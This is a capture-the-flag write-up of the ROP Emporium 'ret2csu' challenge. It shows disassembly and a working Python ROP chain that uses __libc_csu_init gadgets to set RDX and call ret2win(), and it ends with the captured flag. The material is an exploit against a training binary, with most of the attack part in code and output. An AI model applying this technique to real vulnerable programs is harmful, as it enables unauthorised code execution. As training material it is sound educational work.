We’re back in ret2win territory, but this time without the useful gadgets. How will we populate the rdx register without a pop rdx?
The binary and challenge description can be found here:
https://ropemporium.com/challenge/ret2csu.html
While this challenge seems simple on the surface, it actually required a bit more thought than I had anticipated. Mostly due to the different goals we’re hoping to achieve than what is described in challenge description’s recommended reading material. The goal here is simple, call ret2win() with 0xdeadcafebabebeef
supplied as the 3rd function argument. For reference, in Linux x64 systems, we pass the first 3 function arguments in the following registers, respectively: RDI, RSI, RDX. The challenge description points you to a PDF describing the return-to-csu technique from BlackHat Asia 2018. And while this was great for getting started, especially to see where some gadgets exist that aren’t found by tools like ropper
, a few extra steps were needed to complete the challenge. You’ll see what I’m talking about later.
The binary simply asks for input:
andrew ~/ret2csu $ ./ret2csu ret2csu by ROP Emporium Call ret2win() The third argument (rdx) must be 0xdeadcafebabebeef > test
The main hurdle here is to get a specific value into RDX without any useful gadgets that ropper
can find:
andrew ~/ret2csu $ ropper --file ret2csu --search "pop rdx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: pop rdx andrew ~/ret2csu $ ropper --file ret2csu --search "mov rdx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: mov rdx
The “return-to-csu” paper linked to by the challenge description tells us where to start. With the __libc_csu_init() function. This function comes as “attached code” that is conveniently not randomized when ASLR is enabled. Let’s take a look at the disassembly in radare2:
Now, one thing that tripped me up for a while here is that radare2 is not displaying all of the instructions. Do you see the two dots in the left margin? There’s supposed to be a few instructions indicating a loop here. Let’s take a look at the same function in GDB:
For some reason, radare2 is not displaying the following instructions:
0x000000000040088d <+77>: add rbx,0x1 0x0000000000400891 <+81>: cmp rbp,rbx 0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
I’ve submitted an issue on Github for this. Because of that, I’ll be using GDB’s disassembly as these will be important later on. For now, let’s get started with building a ROP chain. There are 2 gadgets here to consider. The first one we can use to populate a few registers:
0x000000000040089a <+90>: pop rbx 0x000000000040089b <+91>: pop rbp 0x000000000040089c <+92>: pop r12 0x000000000040089e <+94>: pop r13 0x00000000004008a0 <+96>: pop r14 0x00000000004008a2 <+98>: pop r15 0x00000000004008a4 <+100>: ret
The second can be used to populate a few more registers and call an arbitrary function:
0x0000000000400880 <+64>: mov rdx,r15 0x0000000000400883 <+67>: mov rsi,r14 0x0000000000400886 <+70>: mov edi,r13d 0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]
Keep in mind that the primary goal here is to populate the RDX register with 0xdeadcafebabebeef
. In order to do that, we’ll need to use that "pop r15"
instruction to get that value into R15, followed by the "mov rdx, r15"
instruction. Then we have the "call QWORD PTR [r12+rbx*8]"
instruction. We can put whatever address we want into R12 and set RBX to 0. So my first thought was, let’s populate RDX with the necessary value and call ret2win(). Easy, right?
#!/usr/bin/env python3 import sys # Gadgets # 1) 0x40089a: pop rbx,rbp,r12,r13,r14,r15; ret # 2) 0x400880: mov rdx,r15; mov rsi,r14; mov edi,r13d; call qword [r12 + rbx*8] p = lambda x: (x).to_bytes(8, "little") buf = b"A" * 40 buf += p(0x40089a) # Gadget 1 buf += p(0) # RBX buf += p(0) # RBP buf += p(0x4007b1) # R12 (ret2win()) buf += p(0) # R13 > RDI buf += p(0) # R14 > RSI buf += p(0xdeadcafebabebeef) # R15 > RDX buf += p(0x400880) # Gadget 2 sys.stdout.buffer.write(buf)
Let’s give it a whirl:
andrew ~/ret2csu $ ./exploit.py | ./ret2csu ret2csu by ROP Emporium Call ret2win() The third argument (rdx) must be 0xdeadcafebabebeef > Segmentation fault (core dumped)
Of course it isn’t that easy. After doing some debugging and reflecting on my life choices, I realized that the "call QWORD PTR [r12+rbx*8]"
instruction isn’t directly calling the address we put in R12. The value “r12+rbx*8” is being de-referenced. It’s calling the address that this value points to. So the first thing I try, is searching for the address of ret2win() in memory.
[0x004005f0]> f~ret2win 0x004007b1 128 sym.ret2win 0x004008e1 15 str.Call_ret2win [0x004005f0]> /v 0x4007b1 Searching 3 bytes in [0x601058-0x601080] hits: 0 Searching 3 bytes in [0x600e10-0x601058] hits: 0 Searching 3 bytes in [0x400000-0x400ac8] hits: 0 [0x004005f0]> pxQ 48 @ sym..dynamic 0x00600e20 0x0000000000000001 section.+1 0x00600e28 0x0000000000000001 section.+1 0x00600e30 0x000000000000000c section.+12 0x00600e38 0x0000000000400560 section..init 0x00600e40 0x000000000000000d section.+13 0x00600e48 0x00000000004008b4 section..fini [0x004005f0]> /v 0x400560 Searching 4 bytes in [0x601058-0x601080] hits: 0 Searching 4 bytes in [0x600e10-0x601058] hits: 1 Searching 4 bytes in [0x400000-0x400ac8] hits: 0 0x00600e38 hit3_0 60054000
Of course, when a search fails, I perform another search that I know should find a match, just to make sure I’m doing it right. As you can see, the .dynamic
section holds addresses to the _init() and _fini() functions. This will be useful knowledge later. For now, let’s go back to the disassembly of __libc_csu_init() and focus on these instructions:
0x0000000000400880 <+64>: mov rdx,r15 0x0000000000400883 <+67>: mov rsi,r14 0x0000000000400886 <+70>: mov edi,r13d 0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8] 0x000000000040088d <+77>: add rbx,0x1 0x0000000000400891 <+81>: cmp rbp,rbx 0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64> 0x0000000000400896 <+86>: add rsp,0x8 0x000000000040089a <+90>: pop rbx 0x000000000040089b <+91>: pop rbp 0x000000000040089c <+92>: pop r12 0x000000000040089e <+94>: pop r13 0x00000000004008a0 <+96>: pop r14 0x00000000004008a2 <+98>: pop r15 0x00000000004008a4 <+100>: ret
If I can make it from that first instruction to the last, I’ll be able to put whatever I want into RDX and set the next link in my ROP chain to the address of ret2win(). What’ll it take? Well, I’ll need to call a function that doesn’t modify RDX and make it past that conditional jump. The conditional jump is easy. We’ll set RBP to 1 and RBX to 0. The instructions will add 1 to RBX, then compare the two. If they’re equal, the jump is not taken. My ROP chain will also need to account for the "add rsp,0x8"
instruction. That just means adding another 8-byte buffer value. The rest of the instructions pop values into various registers but do not modify RDX.
Now, which function should I call? I need to make sure the function does not modify RDX, RBX, and RBP. It also needs to be a function which has its address already stored in memory somewhere. Turns out, _fini() does pretty much nothing. And if you remember from earlier, its address is stored in the .dynamic section:
[0x004005f0]> pdf @ sym._fini ;-- section..fini: ;-- .fini: ┌ 9: sym._fini (); │ bp: 0 (vars 0, args 0) │ sp: 0 (vars 0, args 0) │ rg: 0 (vars 0, args 0) │ 0x004008b4 sub rsp, 8 │ 0x004008b8 add rsp, 8 └ 0x004008bc ret [0x004005f0]> pxQ 48 @ sym..dynamic 0x00600e20 0x0000000000000001 section.+1 0x00600e28 0x0000000000000001 section.+1 0x00600e30 0x000000000000000c section.+12 0x00600e38 0x0000000000400560 section..init 0x00600e40 0x000000000000000d section.+13 0x00600e48 0x00000000004008b4 section..fini
So the R12 register will need to be populated with the value 0x600e48
. Now I should have all the pieces to finish my ROP chain:
#!/usr/bin/env python3 import sys # Gadgets # 1) 0x40089a: pop rbx,rbp,r12,r13,r14,r15; ret # 2) 0x400880: mov rdx,r15; mov rsi,r14; mov edi,r13d; call qword [r12 + rbx*8] p = lambda x: (x).to_bytes(8, "little") buf = b"A" * 40 buf += p(0x40089a) # Gadget 1 buf += p(0) # RBX buf += p(1) # RBP buf += p(0x600e48) # R12 (pointer to _fini()) buf += p(0) # R13 > RDI buf += p(0) # R14 > RSI buf += p(0xdeadcafebabebeef) # R15 > RDX buf += p(0x400880) # Gadget 2 buf += p(0) # padding for "add rsp,0x8" instruction buf += p(0) # RBX buf += p(0) # RBP buf += p(0) # R12 buf += p(0) # R13 buf += p(0) # R14 buf += p(0) # R15 buf += p(0x4007b1) # ret2win() sys.stdout.buffer.write(buf)
This time, it should work, with or without ASLR 🙂
andrew ~/ret2csu $ cat /proc/sys/kernel/randomize_va_space 2 andrew ~/ret2csu $ ./exploit.py | ./ret2csu ret2csu by ROP Emporium Call ret2win() The third argument (rdx) must be 0xdeadcafebabebeef > ROPE{a_placeholder_32byte_flag!} Segmentation fault (core dumped)